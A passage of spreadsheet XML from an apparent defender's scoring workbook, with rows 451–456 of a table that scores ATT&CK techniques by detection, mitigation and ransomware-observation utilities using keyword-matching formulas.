      </c>
      <c r="AB451" s="37">
        <v>0</v>
      </c>
      <c r="AC451" s="37"/>
      <c r="AD451" s="50" t="s">
        <v>1586</v>
      </c>
      <c r="AE451" s="37" t="str" cm="1">
        <f t="array" ref="AE451">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD451)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF451" s="37">
        <v>447</v>
      </c>
      <c r="AG451" s="37" t="str" cm="1">
        <f t="array" ref="AG451">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD451)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH451" s="37">
        <v>447</v>
      </c>
      <c r="AI451" s="37" t="str" cm="1">
        <f t="array" ref="AI451">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD451)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ451" s="37">
        <v>447</v>
      </c>
      <c r="AK451" s="37" t="str" cm="1">
        <f t="array" ref="AK451">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD451)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL451" s="37">
        <v>447</v>
      </c>
      <c r="AM451" s="37" t="str" cm="1">
        <f t="array" ref="AM451">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD451)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN451" s="37">
        <v>0</v>
      </c>
      <c r="AO451" s="37">
        <v>0</v>
      </c>
      <c r="AP451" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ451" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>59.633333333333333</v>
      </c>
      <c r="AR451" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS451" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT451" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU45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52" spans="1:47" ht="17">
      <c r="A452" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B452" s="37">
        <f t="shared" si="6"/>
        <v>179.3</v>
      </c>
      <c r="C452" s="37" t="s">
        <v>3800</v>
      </c>
      <c r="D452" s="50" t="s">
        <v>1550</v>
      </c>
      <c r="E452" s="37" t="s">
        <v>3801</v>
      </c>
      <c r="F452" s="37">
        <v>1</v>
      </c>
      <c r="G452" s="37">
        <v>1</v>
      </c>
      <c r="H452" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I452" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J452" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K452" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L452" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M452" s="37">
        <v>0</v>
      </c>
      <c r="N452" s="56">
        <v>0</v>
      </c>
      <c r="O452" s="56">
        <v>0</v>
      </c>
      <c r="P452" s="56">
        <v>0</v>
      </c>
      <c r="Q452" s="56">
        <v>0</v>
      </c>
      <c r="R452" s="57"/>
      <c r="S452" s="57"/>
      <c r="T452" s="57"/>
      <c r="U452" s="57"/>
      <c r="V452" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W452" s="37"/>
      <c r="X452" s="37"/>
      <c r="Y452" s="37"/>
      <c r="Z452" s="37"/>
      <c r="AA452" s="37"/>
      <c r="AB452" s="37"/>
      <c r="AC452" s="37"/>
      <c r="AD452" s="50" t="s">
        <v>3802</v>
      </c>
      <c r="AE452" s="37" t="str" cm="1">
        <f t="array" ref="AE452">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD452)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF452" s="37">
        <v>448</v>
      </c>
      <c r="AG452" s="37" t="str" cm="1">
        <f t="array" ref="AG452">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD452)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH452" s="37">
        <v>448</v>
      </c>
      <c r="AI452" s="37" t="str" cm="1">
        <f t="array" ref="AI452">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD452)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ452" s="37">
        <v>448</v>
      </c>
      <c r="AK452" s="37" t="str" cm="1">
        <f t="array" ref="AK452">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD452)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL452" s="37">
        <v>448</v>
      </c>
      <c r="AM452" s="37" t="str" cm="1">
        <f t="array" ref="AM452">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD452)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN452" s="37"/>
      <c r="AO452" s="37"/>
      <c r="AP452" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ452" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>59.766666666666673</v>
      </c>
      <c r="AR452" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS452" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT452" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU45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53" spans="1:47" ht="51">
      <c r="A453" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B453" s="37">
        <f t="shared" ref="B453:B516" si="7">SUM(H453,M453,V453)*(1+SUM(AF453,AH453,AJ453,AL453,AN453))</f>
        <v>179.70000000000002</v>
      </c>
      <c r="C453" s="37" t="s">
        <v>3803</v>
      </c>
      <c r="D453" s="50" t="s">
        <v>1550</v>
      </c>
      <c r="E453" s="37" t="s">
        <v>3804</v>
      </c>
      <c r="F453" s="37">
        <v>1</v>
      </c>
      <c r="G453" s="37">
        <v>1</v>
      </c>
      <c r="H453" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I453" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J453" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K453" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L453" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M453" s="37">
        <v>0</v>
      </c>
      <c r="N453" s="56">
        <v>0</v>
      </c>
      <c r="O453" s="56">
        <v>0</v>
      </c>
      <c r="P453" s="56">
        <v>0</v>
      </c>
      <c r="Q453" s="56">
        <v>0</v>
      </c>
      <c r="R453" s="57"/>
      <c r="S453" s="57"/>
      <c r="T453" s="57"/>
      <c r="U453" s="57"/>
      <c r="V453" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W453" s="37"/>
      <c r="X453" s="37"/>
      <c r="Y453" s="37"/>
      <c r="Z453" s="37"/>
      <c r="AA453" s="37"/>
      <c r="AB453" s="37"/>
      <c r="AC453" s="37"/>
      <c r="AD453" s="50" t="s">
        <v>3805</v>
      </c>
      <c r="AE453" s="37" t="str" cm="1">
        <f t="array" ref="AE453">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD453)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF453" s="37">
        <v>449</v>
      </c>
      <c r="AG453" s="37" t="str" cm="1">
        <f t="array" ref="AG453">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD453)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH453" s="37">
        <v>449</v>
      </c>
      <c r="AI453" s="37" t="str" cm="1">
        <f t="array" ref="AI453">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD453)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ453" s="37">
        <v>449</v>
      </c>
      <c r="AK453" s="37" t="str" cm="1">
        <f t="array" ref="AK453">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD453)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL453" s="37">
        <v>449</v>
      </c>
      <c r="AM453" s="37" t="str" cm="1">
        <f t="array" ref="AM453">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD453)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN453" s="37"/>
      <c r="AO453" s="37"/>
      <c r="AP453" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ453" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>59.900000000000006</v>
      </c>
      <c r="AR453" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS453" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT453" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU45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54" spans="1:47" ht="68">
      <c r="A454" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B454" s="37">
        <f t="shared" si="7"/>
        <v>815.119649952381</v>
      </c>
      <c r="C454" s="37" t="s">
        <v>1587</v>
      </c>
      <c r="D454" s="50" t="s">
        <v>1588</v>
      </c>
      <c r="E454" s="37"/>
      <c r="F454" s="37">
        <v>1</v>
      </c>
      <c r="G454" s="37">
        <v>1</v>
      </c>
      <c r="H454" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I454" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J454" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K454" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L454" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M454" s="37">
        <v>2.12E-4</v>
      </c>
      <c r="N454" s="56">
        <v>0</v>
      </c>
      <c r="O454" s="56">
        <v>0</v>
      </c>
      <c r="P454" s="56">
        <v>0</v>
      </c>
      <c r="Q454" s="56">
        <v>0</v>
      </c>
      <c r="R454" s="57" t="s">
        <v>1589</v>
      </c>
      <c r="S454" s="57">
        <v>18</v>
      </c>
      <c r="T454" s="57" t="s">
        <v>1590</v>
      </c>
      <c r="U454" s="57">
        <v>19</v>
      </c>
      <c r="V454" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.35238080952380951</v>
      </c>
      <c r="W454" s="37">
        <v>37</v>
      </c>
      <c r="X454" s="37">
        <v>0.67272699999999996</v>
      </c>
      <c r="Y454" s="37">
        <v>0.67272699999999996</v>
      </c>
      <c r="Z454" s="37">
        <v>0</v>
      </c>
      <c r="AA454" s="37">
        <v>0</v>
      </c>
      <c r="AB454" s="37">
        <v>0</v>
      </c>
      <c r="AC454" s="37"/>
      <c r="AD454" s="50" t="s">
        <v>1591</v>
      </c>
      <c r="AE454" s="37" t="str" cm="1">
        <f t="array" ref="AE454">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD454)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF454" s="37">
        <v>450</v>
      </c>
      <c r="AG454" s="37" t="str" cm="1">
        <f t="array" ref="AG454">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD454)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH454" s="37">
        <v>450</v>
      </c>
      <c r="AI454" s="37" t="str" cm="1">
        <f t="array" ref="AI454">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD454)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ454" s="37">
        <v>450</v>
      </c>
      <c r="AK454" s="37" t="str" cm="1">
        <f t="array" ref="AK454">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD454)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL454" s="37">
        <v>450</v>
      </c>
      <c r="AM454" s="37" t="str" cm="1">
        <f t="array" ref="AM454">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD454)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN454" s="37">
        <v>0</v>
      </c>
      <c r="AO454" s="37">
        <v>1</v>
      </c>
      <c r="AP454" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ454" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>271.70654998412698</v>
      </c>
      <c r="AR454" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS454" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT454" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU45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6.4930130948601663</v>
      </c>
    </row>
    <row r="455" spans="1:47" ht="68">
      <c r="A455" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B455" s="37">
        <f t="shared" si="7"/>
        <v>730.59489428571453</v>
      </c>
      <c r="C455" s="37" t="s">
        <v>1592</v>
      </c>
      <c r="D455" s="50" t="s">
        <v>1588</v>
      </c>
      <c r="E455" s="37" t="s">
        <v>1593</v>
      </c>
      <c r="F455" s="37">
        <v>1</v>
      </c>
      <c r="G455" s="37">
        <v>1</v>
      </c>
      <c r="H455" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I455" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J455" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K455" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L455" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M455" s="37">
        <v>0</v>
      </c>
      <c r="N455" s="56">
        <v>0</v>
      </c>
      <c r="O455" s="56">
        <v>2</v>
      </c>
      <c r="P455" s="56">
        <v>0</v>
      </c>
      <c r="Q455" s="56">
        <v>0</v>
      </c>
      <c r="R455" s="57" t="s">
        <v>1594</v>
      </c>
      <c r="S455" s="57">
        <v>14</v>
      </c>
      <c r="T455" s="57" t="s">
        <v>1595</v>
      </c>
      <c r="U455" s="57">
        <v>17</v>
      </c>
      <c r="V455" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.30476171428571436</v>
      </c>
      <c r="W455" s="37">
        <v>31</v>
      </c>
      <c r="X455" s="37">
        <v>0.56363600000000003</v>
      </c>
      <c r="Y455" s="37">
        <v>0.56363600000000003</v>
      </c>
      <c r="Z455" s="37">
        <v>2</v>
      </c>
      <c r="AA455" s="37">
        <v>0.02</v>
      </c>
      <c r="AB455" s="37">
        <v>0.02</v>
      </c>
      <c r="AC455" s="37"/>
      <c r="AD455" s="50" t="s">
        <v>1591</v>
      </c>
      <c r="AE455" s="37" t="str" cm="1">
        <f t="array" ref="AE455">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD455)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF455" s="37">
        <v>451</v>
      </c>
      <c r="AG455" s="37" t="str" cm="1">
        <f t="array" ref="AG455">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD455)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH455" s="37">
        <v>451</v>
      </c>
      <c r="AI455" s="37" t="str" cm="1">
        <f t="array" ref="AI455">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD455)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ455" s="37">
        <v>451</v>
      </c>
      <c r="AK455" s="37" t="str" cm="1">
        <f t="array" ref="AK455">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD455)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL455" s="37">
        <v>451</v>
      </c>
      <c r="AM455" s="37" t="str" cm="1">
        <f t="array" ref="AM455">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD455)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN455" s="37">
        <v>0</v>
      </c>
      <c r="AO455" s="37">
        <v>0</v>
      </c>
      <c r="AP455" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ455" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>243.5316314285715</v>
      </c>
      <c r="AR455" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS455" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT455" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU45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56" spans="1:47" ht="68">
      <c r="A456" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B456" s="37">
        <f t="shared" si="7"/>
        <v>1007.8718592857143</v>
      </c>
      <c r="C456" s="37" t="s">
        <v>1596</v>
      </c>
      <c r="D456" s="50" t="s">
        <v>1588</v>
      </c>
      <c r="E456" s="37" t="s">
        <v>1597</v>
      </c>
      <c r="F456" s="37">
        <v>1</v>
      </c>
      <c r="G456" s="37">
        <v>1</v>
      </c>
      <c r="H456" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I456" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J456" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K456" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L456" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M456" s="37">
        <v>0</v>
      </c>
      <c r="N456" s="56">
        <v>0</v>
      </c>
      <c r="O456" s="56">
        <v>6</v>
      </c>
      <c r="P456" s="56">
        <v>7</v>
      </c>
      <c r="Q456" s="56">
        <v>1</v>
      </c>
      <c r="R456" s="57" t="s">
        <v>1598</v>
      </c>
      <c r="S456" s="57">
        <v>23</v>
      </c>
      <c r="T456" s="57" t="s">
        <v>1599</v>
      </c>
      <c r="U456" s="57">
        <v>18</v>
      </c>
      <c r="V456" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.45714309523809521</v>
      </c>
      <c r="W456" s="37">
        <v>41</v>
      </c>
      <c r="X456" s="37">
        <v>0.74545499999999998</v>
      </c>
      <c r="Y456" s="37">
        <v>0.74545499999999998</v>
      </c>
      <c r="Z456" s="37">
        <v>14</v>
      </c>
      <c r="AA456" s="37">
        <v>0.14000000000000001</v>
      </c>
      <c r="AB456" s="37">
        <v>0.14000000000000001</v>
      </c>
      <c r="AC456" s="37"/>
      <c r="AD456" s="50" t="s">
        <v>1591</v>
      </c>
      <c r="AE456" s="37" t="str" cm="1">
        <f t="array" ref="AE456">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD456)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF456" s="37">
        <v>452</v>
      </c>
      <c r="AG456" s="37" t="str" cm="1">
        <f t="array" ref="AG456">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD456)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH456" s="37">
        <v>452</v>
      </c>
      <c r="AI456" s="37" t="str" cm="1">
        <f t="array" ref="AI456">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD456)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ456" s="37">
        <v>452</v>
      </c>
      <c r="AK456" s="37" t="str" cm="1">
        <f t="array" ref="AK456">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD456)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL456" s="37">
        <v>452</v>
      </c>
      <c r="AM456" s="37" t="str" cm="1">
        <f t="array" ref="AM456">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD456)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN456" s="37">
        <v>0</v>
      </c>
      <c r="AO456" s="37">
        <v>1</v>
      </c>
      <c r="AP456" s="37">
